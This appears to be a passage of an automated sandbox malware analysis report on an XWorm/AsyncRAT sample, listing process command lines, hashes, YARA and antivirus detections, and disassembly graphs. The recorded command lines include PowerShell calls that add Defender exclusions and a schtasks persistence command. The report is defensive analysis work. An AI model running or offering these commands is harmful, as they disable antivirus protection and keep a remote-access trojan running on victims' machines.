                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:12:52:13
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:12:52:22
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:12:52:22
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:14:18:08
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:14:18:08
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:14:18:36
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
                                                                          Imagebase:0x7ff748e40000
                                                                          File size:235'008 bytes
                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:14:18:36
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:14:18:37
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\boost
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Roaming\boost
                                                                          Imagebase:0xfd0000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\boost, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\boost, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 82%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:14:18:45
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\OpenWith.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                          Imagebase:0x7ff70e480000
                                                                          File size:123'984 bytes
                                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:14:18:47
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:25
                                                                          Start time:14:18:54
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\OpenWith.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                          Imagebase:0x7ff70e480000
                                                                          File size:123'984 bytes
                                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:14:19:01
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\boost
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Roaming\boost
                                                                          Imagebase:0xf90000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:20.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:6
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 4245 7ffaac5810ca 4246 7ffaac582e80 SetWindowsHookExW 4245->4246 4248 7ffaac582f31 4246->4248 4249 7ffaac58102a 4250 7ffaac582940 RtlSetProcessIsCritical 4249->4250 4252 7ffaac5829f2 4250->4252

                                                                            Executed Functions

                                                                            Function 00007FFAAC5812B9 Relevance: 2.1, Strings: 1, Instructions: 809COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CAO_^
                                                                            • API String ID: 0-3111533842
                                                                            • Opcode ID: b0613be76329969d3f66d87a26c040bd82832ece6994ed4a4860fe9d36708a78
                                                                            • Instruction ID: c6a921aabcb805b1fc5cfebe20fae1995bd51f4f608fce8a586a463db4d3d84d
                                                                            • Opcode Fuzzy Hash: b0613be76329969d3f66d87a26c040bd82832ece6994ed4a4860fe9d36708a78
                                                                            • Instruction Fuzzy Hash: 5142E661B5CA0A4FFB94EB38C459BB9B7D6FF89300F448579E44EC32D2CD28A8058781
                                                                            Function 00007FFAAC580F10 Relevance: .5, Instructions: 528COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 377 7ffaac580f10-7ffaac580f1c 379 7ffaac580f1e-7ffaac580f51 377->379 380 7ffaac580f52-7ffaac58a8d2 377->380 379->380 386 7ffaac58a8d8-7ffaac58a8e0 380->386 387 7ffaac58ad61-7ffaac58ad73 call 7ffaac58a3c8 380->387 386->387 389 7ffaac58a8e6-7ffaac58a90d 386->389 390 7ffaac58ad78-7ffaac58ad83 387->390 393 7ffaac58a90f-7ffaac58a91d call 7ffaac58a3b8 389->393 395 7ffaac58a922-7ffaac58a946 call 7ffaac58a3b8 393->395 398 7ffaac58a962 395->398 399 7ffaac58a948-7ffaac58a95c call 7ffaac58a3b8 395->399 401 7ffaac58a967-7ffaac58a97e 398->401 399->398 404 7ffaac58a95e-7ffaac58a960 399->404 405 7ffaac58a985-7ffaac58a987 call 7ffaac580f88 401->405 404->401 407 7ffaac58a98c-7ffaac58a99a 405->407 409 7ffaac58a99c-7ffaac58a9a7 407->409 410 7ffaac58a9be-7ffaac58a9cd 407->410 409->410 414 7ffaac58a9a9-7ffaac58a9b4 409->414 413 7ffaac58a9d1-7ffaac58a9dc 410->413 419 7ffaac58aa26-7ffaac58aa2f 413->419 420 7ffaac58a9de-7ffaac58aa24 413->420 417 7ffaac58a9b6-7ffaac58a9bc 414->417 418 7ffaac58aa31-7ffaac58aa3c 414->418 417->413 423 7ffaac58aa8c-7ffaac58aac8 418->423 424 7ffaac58aa3e-7ffaac58aa5a 418->424 419->418 429 7ffaac58aa6c-7ffaac58aa78 420->429 439 7ffaac58aca7-7ffaac58acb2 423->439 427 7ffaac58aa61-7ffaac58aa6a 424->427 427->429 434 7ffaac58aa7a-7ffaac58aa88 429->434 435 7ffaac58aacd-7ffaac58aad9 429->435 434->435 442 7ffaac58aa8a-7ffaac58aa8b 434->442 440 7ffaac58ab29-7ffaac58ab2f 435->440 441 7ffaac58aadb-7ffaac58ab0b 435->441 446 7ffaac58acb4-7ffaac58acca call 7ffaac583370 439->446 447 7ffaac58acd7-7ffaac58ace4 call 7ffaac580f90 439->447 444 7ffaac58ab3e-7ffaac58ab53 440->444 445 7ffaac58ab31-7ffaac58ab39 440->445 462 7ffaac58ab1a-7ffaac58ab26 441->462 463 7ffaac58ab0d-7ffaac58ab15 441->463 442->423 455 7ffaac58ab62-7ffaac58ab77 444->455 456 7ffaac58ab55-7ffaac58ab5d 444->456 445->439 453 7ffaac58accf-7ffaac58acd4 446->453 458 7ffaac58aceb-7ffaac58aced 447->458 453->447 460 7ffaac58ab86-7ffaac58ab9b 455->460 461 7ffaac58ab79-7ffaac58ab81 455->461 456->439 464 7ffaac58ad05-7ffaac58ad57 call 7ffaac580f90 458->464 465 7ffaac58acef-7ffaac58ad03 458->465 469 7ffaac58abaa-7ffaac58abbf 460->469 470 7ffaac58ab9d-7ffaac58aba5 460->470 461->439 462->440 463->439 473 7ffaac58ad58-7ffaac58ad60 call 7ffaac58ad84 464->473 465->473 478 7ffaac58abce-7ffaac58abe3 469->478 479 7ffaac58abc1-7ffaac58abc9 469->479 470->439 473->387 483 7ffaac58abf2-7ffaac58ac07 478->483 484 7ffaac58abe5-7ffaac58abed 478->484 479->439 487 7ffaac58ac16-7ffaac58ac2b 483->487 488 7ffaac58ac09-7ffaac58ac11 483->488 484->439 492 7ffaac58ac37-7ffaac58ac4c 487->492 493 7ffaac58ac2d-7ffaac58ac35 487->493 488->439 495 7ffaac58ac58-7ffaac58ac6d 492->495 496 7ffaac58ac4e-7ffaac58ac56 492->496 493->439 495->439 498 7ffaac58ac6f-7ffaac58ac93 495->498 496->439 501 7ffaac58ac95-7ffaac58ac9d 498->501 502 7ffaac58ac9f-7ffaac58aca0 498->502 501->439 502->439
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59bfbe9d458a38bcedb2de865e15bca45aef7a02ef174f920c461c519a839047
                                                                            • Instruction ID: 7a6b6ee4dec5db2d2e75f3e0bfe27cb8da807845271eeb84e63a24231e8cff50
                                                                            • Opcode Fuzzy Hash: 59bfbe9d458a38bcedb2de865e15bca45aef7a02ef174f920c461c519a839047
                                                                            • Instruction Fuzzy Hash: 70F13761B6DA5B8BFB94AB38884967977D5FF99700F008475E40DE3282DE28FC0697C1
                                                                            Function 00007FFAAC587D76 Relevance: .5, Instructions: 475COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 503 7ffaac587d76-7ffaac587d83 504 7ffaac587d8e-7ffaac587e57 503->504 505 7ffaac587d85-7ffaac587d8d 503->505 509 7ffaac587e59-7ffaac587e62 504->509 510 7ffaac587ec3 504->510 505->504 509->510 512 7ffaac587e64-7ffaac587e70 509->512 511 7ffaac587ec5-7ffaac587eea 510->511 519 7ffaac587eec-7ffaac587ef5 511->519 520 7ffaac587f56 511->520 513 7ffaac587ea9-7ffaac587ec1 512->513 514 7ffaac587e72-7ffaac587e84 512->514 513->511 516 7ffaac587e88-7ffaac587e9b 514->516 517 7ffaac587e86 514->517 516->516 518 7ffaac587e9d-7ffaac587ea5 516->518 517->516 518->513 519->520 521 7ffaac587ef7-7ffaac587f03 519->521 522 7ffaac587f58-7ffaac588000 520->522 523 7ffaac587f3c-7ffaac587f54 521->523 524 7ffaac587f05-7ffaac587f17 521->524 533 7ffaac58806e 522->533 534 7ffaac588002-7ffaac58800c 522->534 523->522 526 7ffaac587f1b-7ffaac587f2e 524->526 527 7ffaac587f19 524->527 526->526 529 7ffaac587f30-7ffaac587f38 526->529 527->526 529->523 535 7ffaac588070-7ffaac588099 533->535 534->533 536 7ffaac58800e-7ffaac58801b 534->536 542 7ffaac588103 535->542 543 7ffaac58809b-7ffaac5880a6 535->543 537 7ffaac58801d-7ffaac58802f 536->537 538 7ffaac588054-7ffaac58806c 536->538 540 7ffaac588031 537->540 541 7ffaac588033-7ffaac588046 537->541 538->535 540->541 541->541 544 7ffaac588048-7ffaac588050 541->544 546 7ffaac588105-7ffaac588196 542->546 543->542 545 7ffaac5880a8-7ffaac5880b6 543->545 544->538 547 7ffaac5880b8-7ffaac5880ca 545->547 548 7ffaac5880ef-7ffaac588101 545->548 554 7ffaac58819c-7ffaac5881ab 546->554 549 7ffaac5880cc 547->549 550 7ffaac5880ce-7ffaac5880e1 547->550 548->546 549->550 550->550 552 7ffaac5880e3-7ffaac5880eb 550->552 552->548 555 7ffaac5881b3-7ffaac588218 call 7ffaac588234 554->555 556 7ffaac5881ad 554->556 563 7ffaac58821a 555->563 564 7ffaac58821f-7ffaac588233 555->564 556->555 563->564
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72f70e89346727c5c136b5cd489bfffdf207ad2b45a8696422fec106c59ddf75
                                                                            • Instruction ID: f7f524ff0b422f040bb1f3112a8d6b03ce25e0b3886449184e2da3bec1f4f40c
                                                                            • Opcode Fuzzy Hash: 72f70e89346727c5c136b5cd489bfffdf207ad2b45a8696422fec106c59ddf75
                                                                            • Instruction Fuzzy Hash: 0CF1A270909A8E8FEBA8DF28C855BF937D1FF55350F04826AE84DC7291CF7499458B82
                                                                            Function 00007FFAAC588B22 Relevance: .5, Instructions: 461COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 565 7ffaac588b22-7ffaac588b2f 566 7ffaac588b3a-7ffaac588c07 565->566 567 7ffaac588b31-7ffaac588b39 565->567 571 7ffaac588c73 566->571 572 7ffaac588c09-7ffaac588c12 566->572 567->566 574 7ffaac588c75-7ffaac588c9a 571->574 572->571 573 7ffaac588c14-7ffaac588c20 572->573 575 7ffaac588c22-7ffaac588c34 573->575 576 7ffaac588c59-7ffaac588c71 573->576 580 7ffaac588d06 574->580 581 7ffaac588c9c-7ffaac588ca5 574->581 578 7ffaac588c36 575->578 579 7ffaac588c38-7ffaac588c4b 575->579 576->574 578->579 579->579 582 7ffaac588c4d-7ffaac588c55 579->582 584 7ffaac588d08-7ffaac588d2d 580->584 581->580 583 7ffaac588ca7-7ffaac588cb3 581->583 582->576 585 7ffaac588cb5-7ffaac588cc7 583->585 586 7ffaac588cec-7ffaac588d04 583->586 591 7ffaac588d9b 584->591 592 7ffaac588d2f-7ffaac588d39 584->592 587 7ffaac588cc9 585->587 588 7ffaac588ccb-7ffaac588cde 585->588 586->584 587->588 588->588 590 7ffaac588ce0-7ffaac588ce8 588->590 590->586 593 7ffaac588d9d-7ffaac588dcb 591->593 592->591 594 7ffaac588d3b-7ffaac588d48 592->594 601 7ffaac588e3b 593->601 602 7ffaac588dcd-7ffaac588dd8 593->602 595 7ffaac588d4a-7ffaac588d5c 594->595 596 7ffaac588d81-7ffaac588d99 594->596 597 7ffaac588d5e 595->597 598 7ffaac588d60-7ffaac588d73 595->598 596->593 597->598 598->598 600 7ffaac588d75-7ffaac588d7d 598->600 600->596 603 7ffaac588e3d-7ffaac588f15 601->603 602->601 604 7ffaac588dda-7ffaac588de8 602->604 614 7ffaac588f1b-7ffaac588f2a 603->614 605 7ffaac588dea-7ffaac588dfc 604->605 606 7ffaac588e21-7ffaac588e39 604->606 608 7ffaac588dfe 605->608 609 7ffaac588e00-7ffaac588e13 605->609 606->603 608->609 609->609 611 7ffaac588e15-7ffaac588e1d 609->611 611->606 615 7ffaac588f32-7ffaac588f94 call 7ffaac588fb0 614->615 616 7ffaac588f2c 614->616 623 7ffaac588f96 615->623 624 7ffaac588f9b-7ffaac588faf 615->624 616->615 623->624
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d70d13d81f3ae29ad47cd18be36dc3c61c2e736b702966b20ce201f20d7779f
                                                                            • Instruction ID: 4fe29cfde808a58ffacc7a366e5c0e80c399bea56963a66f409fab3f78cc7871
                                                                            • Opcode Fuzzy Hash: 6d70d13d81f3ae29ad47cd18be36dc3c61c2e736b702966b20ce201f20d7779f
                                                                            • Instruction Fuzzy Hash: 5AE1A070909A8E8FEBA8DF28C8557F977D1FF55310F04826AE84DC7291CA74E9458BC1
                                                                            Function 00007FFAAC581C4D Relevance: .2, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e4d86a9b1dbee58d7f40e1dddd0795d403178e6ba2feca7d085ea9064062ea0
                                                                            • Instruction ID: 446f3bf20316525e078bf5b8df6d8357efa21797d7db952d7e9ef8acb167408e
                                                                            • Opcode Fuzzy Hash: 2e4d86a9b1dbee58d7f40e1dddd0795d403178e6ba2feca7d085ea9064062ea0
                                                                            • Instruction Fuzzy Hash: 1E512451A5E6C64FE786A73898646767FD8EF97215F1804FBE0CDC7193DD085806C382
                                                                            Function 00007FFAAC58290D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 183 7ffaac58290d-7ffaac5829f0 RtlSetProcessIsCritical 187 7ffaac5829f8-7ffaac582a2d 183->187 188 7ffaac5829f2 183->188 188->187
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: 78e31e1c9cd12faca4928a6484f4e560140c987f8a133e9b54b5b612cb9b8f75
                                                                            • Instruction ID: 7dba1f742e94f7e8fb5f41785a724117aa72e191ce46485b5f262d39f60e1a7a
                                                                            • Opcode Fuzzy Hash: 78e31e1c9cd12faca4928a6484f4e560140c987f8a133e9b54b5b612cb9b8f75
                                                                            • Instruction Fuzzy Hash: 6141C33180C6598FD719DFA8D845BE9BBF0FF56311F04416EE08AD3692CB74A846CB91
                                                                            Function 00007FFAAC582E58 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 190 7ffaac582e58-7ffaac582e5f 191 7ffaac582e61-7ffaac582e69 190->191 192 7ffaac582e6a-7ffaac582edd 190->192 191->192 196 7ffaac582f69-7ffaac582f6d 192->196 197 7ffaac582ee3-7ffaac582ee8 192->197 198 7ffaac582ef2-7ffaac582f2f SetWindowsHookExW 196->198 199 7ffaac582eef-7ffaac582ef0 197->199 200 7ffaac582f31 198->200 201 7ffaac582f37-7ffaac582f68 198->201 199->198 200->201
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: bbf59ffab06388f61f8f6e08a6da50c3eccd98fa84f251c4a5fcf57b19a01538
                                                                            • Instruction ID: 7b0648837373ae188135102adbf1b78cb5f82f26a1e7837bbfd30f9056b0299d
                                                                            • Opcode Fuzzy Hash: bbf59ffab06388f61f8f6e08a6da50c3eccd98fa84f251c4a5fcf57b19a01538
                                                                            • Instruction Fuzzy Hash: 7F31EA7191CA4D4FDB18DB6CD8066F97BE1FB56321F00427ED04DC3292CE64A81687C1
                                                                            Function 00007FFAAC5810CA Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 204 7ffaac5810ca-7ffaac582edd 208 7ffaac582f69-7ffaac582f6d 204->208 209 7ffaac582ee3-7ffaac582ee8 204->209 210 7ffaac582ef2-7ffaac582f2f SetWindowsHookExW 208->210 211 7ffaac582eef-7ffaac582ef0 209->211 212 7ffaac582f31 210->212 213 7ffaac582f37-7ffaac582f68 210->213 211->210 212->213
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 33c5ee7261cf506fba3c7dc790af7b9fd7ec8d640c99f0212e6b37233f9f5622
                                                                            • Instruction ID: 3221978a236ed644d32278199616884c6c042ae06c0264afa102b951a0299ac1
                                                                            • Opcode Fuzzy Hash: 33c5ee7261cf506fba3c7dc790af7b9fd7ec8d640c99f0212e6b37233f9f5622
                                                                            • Instruction Fuzzy Hash: 6631E87191C91D9FDB58EB6CD8066F977E1FB69311F10423EE04ED3251CA60A80287C1
                                                                            Function 00007FFAAC58102A Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 216 7ffaac58102a-7ffaac58298a 219 7ffaac582992-7ffaac5829f0 RtlSetProcessIsCritical 216->219 220 7ffaac5829f8-7ffaac582a2d 219->220 221 7ffaac5829f2 219->221 221->220
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: a449bb88349d21ed5d78d3ad042654d7d8db9a24b423a6ebe1fb3e581a89a3dd
                                                                            • Instruction ID: e0350c9f8ff136bb9db8f0509bf14e1421ac0d95c121a15cce6bc8c5a20679a3
                                                                            • Opcode Fuzzy Hash: a449bb88349d21ed5d78d3ad042654d7d8db9a24b423a6ebe1fb3e581a89a3dd
                                                                            • Instruction Fuzzy Hash: 4831C27190CA198FDB28DB6CD845BF9BBE0FF55311F14412EE09AD3691CB70A8468B91

                                                                            Executed Functions

                                                                            Function 00007FFAAC57644D Relevance: .7, Instructions: 735COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9fbda57c72e8b786b0fab44badab95e22495f68e2fa1eb83eb2bc15a04a076f
                                                                            • Instruction ID: e911353b92a8acf19266ce455244efc6e0c36d889a8504ed6821b9a06b213f04
                                                                            • Opcode Fuzzy Hash: c9fbda57c72e8b786b0fab44badab95e22495f68e2fa1eb83eb2bc15a04a076f
                                                                            • Instruction Fuzzy Hash: 91D16C30A18A5E8FEF84DF58C455AA97BE1FF69300F14856AE40DD7296CE34E885CBC1
                                                                            Function 00007FFAAC646605 Relevance: .4, Instructions: 439COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 75301391fba6c7245ad1ae600845c02f33769548e0889c404dd14cb720a5b2dc
                                                                            • Instruction ID: e21dbc770f8565ac2d4783349994265abf5fdc580d6965bad3b2bb473c749657
                                                                            • Opcode Fuzzy Hash: 75301391fba6c7245ad1ae600845c02f33769548e0889c404dd14cb720a5b2dc
                                                                            • Instruction Fuzzy Hash: DBD1257190EB8A8FF7A6DB68C9555B57BA0EF46310B0851BEE44DC70D3EE18D809C392
                                                                            Function 00007FFAAC579EFB Relevance: .3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
